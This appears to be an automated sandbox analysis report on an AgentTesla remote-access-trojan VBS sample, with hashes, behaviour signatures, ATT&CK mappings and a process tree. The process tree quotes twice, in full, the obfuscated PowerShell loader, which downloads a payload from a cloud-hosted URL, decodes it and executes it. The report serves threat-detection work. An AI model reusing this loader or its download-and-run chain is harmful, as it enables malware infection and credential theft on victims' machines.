Analysis

  • max time kernel
    144s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 19:26

General

  • Target

    d14ef42bd2f3ecb7ff2e7ea8b7fd79b06f5b048c2f181381b5f8b790b7228f3b.vbs

  • Size

    5KB

  • MD5

    62bc79cdf5d55f891ae6d2a662cb87fc

  • SHA1

    2ab352feb12da98eca4c5ec9ce4b349f5731ab50

  • SHA256

    d14ef42bd2f3ecb7ff2e7ea8b7fd79b06f5b048c2f181381b5f8b790b7228f3b

  • SHA512

    1335d32fa999b5f3729f0b94caf214e09b78c9f3108c05e8fb6fddb828f7d8049a17c2e1b72ca12203ebdda0141d22c326e1986057677fdb9efe6970638c7db2

  • SSDEEP

    96:QsLisJvmYz2W6/F5J9eI8L7YMH8NJPW0agOVTLU5VFPB5Gv9rmJ/pCz6cfp:QJs7R6/F53IYG8NJu0aTV/cFaFrmxpCv

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Blocklisted process makes network request 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d14ef42bd2f3ecb7ff2e7ea8b7fd79b06f5b048c2f181381b5f8b790b7228f3b.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2792
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ramon='Sub';$Ramon+='strin';$Rkkeudviklingers = 1;$Ramon+='g';Function menuetter($Fusicladium){$Nationalitetsmrkers=$Fusicladium.Length-$Rkkeudviklingers;For($Grindehval=1;$Grindehval -lt $Nationalitetsmrkers;$Grindehval+=2){$Rejektioner+=$Fusicladium.$Ramon.Invoke( $Grindehval, $Rkkeudviklingers);}$Rejektioner;}function Birthed14($Taalbond24){& ($Psychologism) ($Taalbond24);}$Dybfrosnes=menuetter ' M o,zCiSlmlAa./,5S.K0. (GWNiInFdFo,wOs NN T .1R0C. 0H;L WPiInM6s4 ;T BxP6P4.;. rEv,:,1D2P1a.S0I). .GCeLcOkKo,/ 2D0F1B0.0 1,0E1 HFRi rBePfSo,x,/C1 2S1,.K0O ';$Emigreringers=menuetter ' U sMe r.- Asg.eKnTtM ';$Grundvandsreservoirets=menuetter ' h.tStAp s : /M/KdUr,iovHe,. gAocoEgAl.eA.ScDo ml/LuPc,?He x,pJoDr t,=PdOoCw,n lHo aUd &Bi d = 1O-CydPMM,F K.R u.FSL.JCkUcBf 2eLKzRs,_OlPmCH m.E j,QHo l u,c 2tf. ';$Infructuose=menuetter 'G>g ';$Psychologism=menuetter ' i eFxa ';$Wrightry='Danoranja';$Leukoctyoid = menuetter ' eAc hLoD K%Ua p.pHdVaGt ak%U\SM i a uBl.e d .,B.iNo. .&E& Ue,c.h.oP Ot, ';Birthed14 (menuetter '.$ g lMo b a l :.S mTu d spt.i.tslAeSrOnme sS=S(Ac m db /Pch $ L,eTuRkGoScnt,y,o,i d )S ');Birthed14 (menuetter ' $ g.lMoDb,aRlK:LUeg e,n.t l iTgG= $ G r uRnBd vPaPnpd s.r.e s eFrPvFoMiar,eSt,sM.rsLpCl iAt (A$AI.nAfBr uJc,tSu.o.sPe )F ');$Grundvandsreservoirets=$Ugentlig[0];$Elderwood= (menuetter ' $ g l o.b aBlS:CBFlHaFc,k.g uDaFrSdc= NFeKwD- O b.jMeFcUt. S yRs t.e mP. N e.ta..W eRbCC.l,iUePn t');$Elderwood+=$Smudstitlernes[1];Birthed14 ($Elderwood);Birthed14 (menuetter ' $ BTlCa cFkDg uBadr d .kHDeSaJdce rFsM[U$ E,m,iEgUrSe r,iAn,gCetr s,] =D$ DYyBb fFr oVsTnAeRsP ');$Afsones=menuetter 'M$CBPlNaAc k.gPu aRr d.. D odwBnSl o,a d FMiTl,eL( $SG,r,u n dAv a n dOs rBeSsCe r vSo,isrDeFt s,,m$.UNg uNd eSl,iTgPhVe dR)D ';$Ugudelighed=$Smudstitlernes[0];Birthed14 (menuetter ',$ gIl.oRb a l :.v e n,sHkPaDb.eBr,sV=B(,TAe sBtR-TP aRtch D$kU gbuMdSe.lSi g.h ePd ) ');while (!$venskabers) {Birthed14 (menuetter 'F$Ug,lPo.bGaMl :AE r,eBl oAnTgR= $ t rIu eG ') ;Birthed14 $Afsones;Birthed14 (menuetter ',SLttaMrgt.- SCl.e,eRpA D4k ');Birthed14 (menuetter 'D$Tg l oFb aNlF:BvRe,nesck.aZbSe r sC=.( T e sRtS-RPDaAtKh $HU.g u.dFe.l,img.hPe.ds). ') ;Birthed14 (menuetter ',$FgMl o bPa lH: S,tTi.vTeTr.eBnS= $.g l.o.bBa lT:CMDaOl,tTy,+F+C%K$HUNgSeUn tMlFi g..Sc o.u nStD ') ;$Grundvandsreservoirets=$Ugentlig[$Stiveren];}$Underindeksets=367934;$Opsamling=26710;Birthed14 (menuetter ' $Fg l oKbEa.l :.M iWl.iKeSuLb e s.kly,tSt ePl sSe sAiDnHtLePrReTs s.e.r.nBeMsS U= IG eTtu- CBo,n tHe,n t U$RU g u,d e.l,iDg hSe.d ');Birthed14 (menuetter ' $.gIlNoGbUa.lM:ApPe rRq u,i sNiDtAe sU e=, [ S y s t e mV. CLo.n.vPeIr tT]K:S:KF,r,oRmFBMaSsUeG6S4 SPtyrOi.nFgT(d$.MTiJl iSe uEbBe sSk.y tStReBl sCe,s iNn tGeFr,e s sfe.r noe sj) ');Birthed14 (menuetter '.$ZgAl,oIb aTlS:.P r,iEn tSeFrEp,r,oIgPrTaEm m e,r sN O=R ,[SSiy sDt,e.mE.,T e x tC. EEn.cSoSd i nIg.],:,: AOS,C I I . GGeOtSS.tBr i n g,(.$,pSe.r.q u iBsaibtpegs ), ');Birthed14 (menuetter 'S$,gMl oBbAa,lG:NRAeGvPe.lCa.bDi l.i t y.=J$sP r.idnNt,eGrFp.rCoHgErEa mSm eArEs,. sGu b sLt.rMi nhg.(O$,UCnYd ePrGiDnFd etkRste tcs ,O$TO,pIsFalm.l i.n,gS) ');Birthed14 $Revelability;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2668
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Miauled.Bio && echo t"
        3⤵
          PID:2788
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ramon='Sub';$Ramon+='strin';$Rkkeudviklingers = 1;$Ramon+='g';Function menuetter($Fusicladium){$Nationalitetsmrkers=$Fusicladium.Length-$Rkkeudviklingers;For($Grindehval=1;$Grindehval -lt $Nationalitetsmrkers;$Grindehval+=2){$Rejektioner+=$Fusicladium.$Ramon.Invoke( $Grindehval, $Rkkeudviklingers);}$Rejektioner;}function Birthed14($Taalbond24){& ($Psychologism) ($Taalbond24);}$Dybfrosnes=menuetter ' M o,zCiSlmlAa./,5S.K0. (GWNiInFdFo,wOs NN T .1R0C. 0H;L WPiInM6s4 ;T BxP6P4.;. rEv,:,1D2P1a.S0I). .GCeLcOkKo,/ 2D0F1B0.0 1,0E1 HFRi rBePfSo,x,/C1 2S1,.K0O ';$Emigreringers=menuetter ' U sMe r.- Asg.eKnTtM ';$Grundvandsreservoirets=menuetter ' h.tStAp s : /M/KdUr,iovHe,. gAocoEgAl.eA.ScDo ml/LuPc,?He x,pJoDr t,=PdOoCw,n lHo aUd &Bi d = 1O-CydPMM,F K.R u.FSL.JCkUcBf 2eLKzRs,_OlPmCH m.E j,QHo l u,c 2tf. ';$Infructuose=menuetter 'G>g ';$Psychologism=menuetter ' i eFxa ';$Wrightry='Danoranja';$Leukoctyoid = menuetter ' eAc hLoD K%Ua p.pHdVaGt ak%U\SM i a uBl.e d .,B.iNo. .&E& Ue,c.h.oP Ot, ';Birthed14 (menuetter '.$ g lMo b a l :.S mTu d spt.i.tslAeSrOnme sS=S(Ac m db /Pch $ L,eTuRkGoScnt,y,o,i d )S ');Birthed14 (menuetter ' $ g.lMoDb,aRlK:LUeg e,n.t l iTgG= $ G r uRnBd vPaPnpd s.r.e s eFrPvFoMiar,eSt,sM.rsLpCl iAt (A$AI.nAfBr uJc,tSu.o.sPe )F ');$Grundvandsreservoirets=$Ugentlig[0];$Elderwood= (menuetter ' $ g l o.b aBlS:CBFlHaFc,k.g uDaFrSdc= NFeKwD- O b.jMeFcUt. S yRs t.e mP. N e.ta..W eRbCC.l,iUePn t');$Elderwood+=$Smudstitlernes[1];Birthed14 ($Elderwood);Birthed14 (menuetter ' $ BTlCa cFkDg uBadr d .kHDeSaJdce rFsM[U$ E,m,iEgUrSe r,iAn,gCetr s,] =D$ DYyBb fFr oVsTnAeRsP ');$Afsones=menuetter 'M$CBPlNaAc k.gPu aRr d.. D odwBnSl o,a d FMiTl,eL( $SG,r,u n dAv a n dOs rBeSsCe r vSo,isrDeFt s,,m$.UNg uNd eSl,iTgPhVe dR)D ';$Ugudelighed=$Smudstitlernes[0];Birthed14 (menuetter ',$ gIl.oRb a l :.v e n,sHkPaDb.eBr,sV=B(,TAe sBtR-TP aRtch D$kU gbuMdSe.lSi g.h ePd ) ');while (!$venskabers) {Birthed14 (menuetter 'F$Ug,lPo.bGaMl :AE r,eBl oAnTgR= $ t rIu eG ') ;Birthed14 $Afsones;Birthed14 (menuetter ',SLttaMrgt.- SCl.e,eRpA D4k ');Birthed14 (menuetter 'D$Tg l oFb aNlF:BvRe,nesck.aZbSe r sC=.( T e sRtS-RPDaAtKh $HU.g u.dFe.l,img.hPe.ds). ') ;Birthed14 (menuetter ',$FgMl o bPa lH: S,tTi.vTeTr.eBnS= $.g l.o.bBa lT:CMDaOl,tTy,+F+C%K$HUNgSeUn tMlFi g..Sc o.u nStD ') ;$Grundvandsreservoirets=$Ugentlig[$Stiveren];}$Underindeksets=367934;$Opsamling=26710;Birthed14 (menuetter ' $Fg l oKbEa.l :.M iWl.iKeSuLb e s.kly,tSt ePl sSe sAiDnHtLePrReTs s.e.r.nBeMsS U= IG eTtu- CBo,n tHe,n t U$RU g u,d e.l,iDg hSe.d ');Birthed14 (menuetter ' $.gIlNoGbUa.lM:ApPe rRq u,i sNiDtAe sU e=, [ S y s t e mV. CLo.n.vPeIr tT]K:S:KF,r,oRmFBMaSsUeG6S4 SPtyrOi.nFgT(d$.MTiJl iSe uEbBe sSk.y tStReBl sCe,s iNn tGeFr,e s sfe.r noe sj) ');Birthed14 (menuetter '.$ZgAl,oIb aTlS:.P r,iEn tSeFrEp,r,oIgPrTaEm m e,r sN O=R ,[SSiy sDt,e.mE.,T e x tC. EEn.cSoSd i nIg.],:,: AOS,C I I . GGeOtSS.tBr i n g,(.$,pSe.r.q u iBsaibtpegs ), ');Birthed14 (menuetter 'S$,gMl oBbAa,lG:NRAeGvPe.lCa.bDi l.i t y.=J$sP r.idnNt,eGrFp.rCoHgErEa mSm eArEs,. sGu b sLt.rMi nhg.(O$,UCnYd ePrGiDnFd etkRste tcs ,O$TO,pIsFalm.l i.n,gS) ');Birthed14 $Revelability;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2780
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Miauled.Bio && echo t"
            4⤵
              PID:2564
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Adds Run key to start application
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1940

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Modify Registry

      1
      T1112

      Discovery

      System Information Discovery

      1
      T1082

      Command and Control

      Web Service

      1
      T1102

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Miauled.Bio
        Filesize

        513KB

        MD5

        5b57c4407f9d0632c096d9a498cae912

        SHA1

        47b678f24bd4058986a9d87e06fe3826bda70f65

        SHA256

        4d198b43eb5c549aca827741cbb753ddb35bb444cb0599a8afe355f110d74fe6

        SHA512

        bffa2c0c420bd29fca818d9acbd60a637e8f51dbdc789d26decf7169cda9f641deeba8e89aef9ecb74be67c4cb3080269650b55e70da7d1aa095169e4d43f670

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JSTWFQIDT6Q8MV3U9BCR.temp
        Filesize

        7KB

        MD5

        4f3716395031839b3918733d5436cff4

        SHA1

        ffe0cfd3292369016d8743b5c0758cefbffdcce1

        SHA256

        7a878073c0e9e9f0e385421b61ecd49670fed304e4302a9f5124b8cff9ba4d0e

        SHA512

        1c0f989ad7402ecf3f90ba3e9af8bddc74a141f99d0bc73d81af4c00953b50f8ef19d65d7502e4ba305e7db94b21f391bd6734ff887135960ebf1df67c6e1e77

      • memory/1940-43-0x0000000000DA0000-0x0000000000E16000-memory.dmp
        Filesize

        472KB

      • memory/1940-41-0x0000000000DA0000-0x0000000001E02000-memory.dmp
        Filesize

        16.4MB

      • memory/2668-10-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp
        Filesize

        9.6MB

      • memory/2668-9-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp
        Filesize

        9.6MB

      • memory/2668-4-0x000007FEF5BCE000-0x000007FEF5BCF000-memory.dmp
        Filesize

        4KB

      • memory/2668-8-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp
        Filesize

        9.6MB

      • memory/2668-5-0x000000001B4C0000-0x000000001B7A2000-memory.dmp
        Filesize

        2.9MB

      • memory/2668-17-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp
        Filesize

        9.6MB

      • memory/2668-18-0x000007FEF5BCE000-0x000007FEF5BCF000-memory.dmp
        Filesize

        4KB

      • memory/2668-6-0x00000000021D0000-0x00000000021D8000-memory.dmp
        Filesize

        32KB

      • memory/2668-7-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp
        Filesize

        9.6MB

      • memory/2668-44-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp
        Filesize

        9.6MB

      • memory/2780-16-0x00000000065B0000-0x0000000008672000-memory.dmp
        Filesize

        32.8MB